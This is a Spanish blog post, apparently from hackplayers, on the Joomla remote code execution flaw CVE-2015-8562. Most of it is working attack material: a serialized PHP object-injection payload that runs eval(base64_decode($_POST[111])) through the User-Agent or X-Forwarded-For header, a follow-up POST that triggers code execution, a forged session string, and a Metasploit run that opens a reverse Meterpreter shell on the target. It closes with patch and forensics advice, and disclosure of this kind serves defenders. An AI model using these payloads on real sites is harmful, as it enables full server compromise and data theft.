La petición:
2015 Dec 12 16:49:07 clienyhidden.access.log
Src IP: 74.3.XX.XX / CAN / Alberta
74.3.XX.XX [12/Dec/2015:16:49:40 -0500] GET /contact/ HTTP/1.1 403 5322 http://google.com/ }__test|O:21:x22JDatabaseDriverMysqlix22:3: ..{s:2:x22fcx22;O:17:x22JSimplepieFactoryx22:0: .. {}s:21:x22x5C0x5C0x5C0disconnectHandlersx22;a:1:{i:0;a:2:{i:0;O:9:x22SimplePiex22:5:..{s:8:x22sanitizex22;O:20:x22JDatabaseDriverMysqlx22:0:{}s:8:x22feed_urlx22;s:60:..
El payload:
}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:60:\x22eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\x9D\x8C\x86Paste your text here.
Si desofuscamos:
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}��
La vulnerabilidad funciona incluso sin autenticación previa y, cómo podrás ver, básicamente es debida a que Joomla usa el contenido de user-agent y x-forwarded-for para escribir la sesión sin ningún control interno y sin filtrar:
GET / joomla / HTTP / 1.1 Host: 192.168.152.130 User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko / 20100101 Firefox / 30.0 x-forwarded-for:} __ test | O: 21: " JDatabaseDriverMysqli ": 3: {s: 2:" fc "; O: 17:" JSimplepieFactory ": 0: {} s: 21:" disconnectHandlers "; a: 1: {i: 0; a: 2: {i: 0; O: 9: "SimplePie": 5: {s: 8: "sanitize"; O: 20: "JDatabaseDriverMysql": 0: {} s: 8: "feed_url"; s: 60: "eval (base64_decode ( $ _POST [111])); JFactory :: getConfig (); exit; "; s: 19:" cache_name_function "; s: 6:" assert "; s: 5:" cache "; b: 1; s: 11 : "cache_class"; O: 20: "JDatabaseDriverMysql": 0: {}} i: 1; s: 4: "init";}} s: 13: "connection"; b: 1;} ð Œ † Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8 Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3 Accept-Encoding: gzip, deflate Cookie: 82864b7eae85ebcf7a6fbdda5d464249 = h5kl99v8ddi9t64919sf706q64 Connection: keep-alive
Código de ejecución:
POST / joomla / HTTP / 1.1
Host: 192.168.152.130
User-Agent: Mozilla / 5.0 (Windows NT 6.1; WOW64; rv: 30.0) Gecko / 20100101 Firefox / 30.0
Accept: text / html, application / xhtml + xml, application / xml; q = 0.9, * / *; q = 0.8
Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Cookie: 82864b7eae85ebcf7a6fbdda5d464249 = h5kl99v8ddi9t64919sf706q64
Connection: keep-alive
Content-Type: application / x-www-form-urlencoded
Content-Length: 24
111 = cGhwaW5mbygpOw% 3d% 3d
Ummm.. así que podemos inyectar en la cabecera HTTP y poner un nuevo identificador de sesión con los datos serializados:
__default|a:8:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1450169533;s:18:"session.timer.last";i:1450169533;s:17:"session.timer.now";i:1450169533;s:22:"session.client.browser";s:4:"TEST";s:8:"registry";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\0\0\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"9";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\0\0\0_params";O:24:"Joomla\Registry\Registry":2:{s:7:"\0\0\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\0\0\0_authGroups";a:2:{i:0;i:1;i:1;i:9;}s:14:"\0\0\0_authLevels";a:3:{i:0;i:1;i:1;i:1;i:2;i:5;}s:15:"\0\0\0_authActions";N;s:12:"\0\0\0_errorMsg";N;s:13:"\0\0\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\0\0\0_errors";a:0:{}s:3:"aid";i:0;}s:16:"com_mailto.links";a:4:{s:40:"864263691cf020260fd769f9e91b5152c4a0e278";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/3-welcome-to-your-blog";s:6:"expiry";i:1450169533;}s:40:"a7425dbaaa274c9c71da73ebdfc40ed0e1941365";O:8:"stdClass":2:{s:4:"link";s:54:"http://127.0.0.1:8181/index.php/4-about-your-home-page";s:6:"expiry";i:1450169533;}s:40:"50717150dd908262db5e49b4334dcc7f2d3bd0dd";O:8:"stdClass":2:{s:4:"link";s:47:"http://127.0.0.1:8181/index.php/6-your-template";s:6:"expiry";i:1450169533;}s:40:"78e8cf066aacebaecd359c665129e4281e269205";O:8:"stdClass":2:{s:4:"link";s:46:"http://127.0.0.1:8181/index.php/5-your-modules";s:6:"expiry";i:1450169533;}}}
Y para mayor comodidad ya tienes en vuestras casas el módulo de Metasploit correspondiente, probado en Ubuntu 12.04:
msf exploit(joomla_user_agent_rce) > show options
Module options (exploit/multi/http/joomla_user_agent_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 10.211.55.23 yes The target address
RPORT 80 yes The target port
TARGETURI /joomla/ yes The path to joomla
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Joomla
msf exploit(joomla_user_agent_rce) > run
[*] Started reverse handler on 10.211.55.2:4444
[*] Sending payload ...
[*] Sending stage (33068 bytes) to 10.211.55.23
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.23:60834) at 2015-12-15 17:22:22 +0100
^C[-] Exploit failed: Interrupt
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:51:20 UTC 2014 x86_64
Meterpreter : php/php
meterpreter >
Así que si usas este CMS y no has parcheado todavía la vulnerabilidad (CVE-2015-8562) te recomendamos encarecidamente darte prisa en hacerlo... y hacer un buen forense por si ya has sido comprometido...
Parchea:
https://www.joomla.org/announcements/release-news/5641-joomla-3-4-6-released.html
Fuentes:
- Critical 0-day Remote Command Execution Vulnerability in Joomla
- [20151201] - Core - Remote Code Execution Vulnerability
- Patch now! Joomla attacked in remote code execution blitzkrieg
- Joomla对象注入漏洞分析(含漏洞利用方式)
- [Request] Critical 0day RCE in joomla #6347
- Critical 0-day Remote Command Execution Vulnerability in Joomla!
- www.hackplayers.com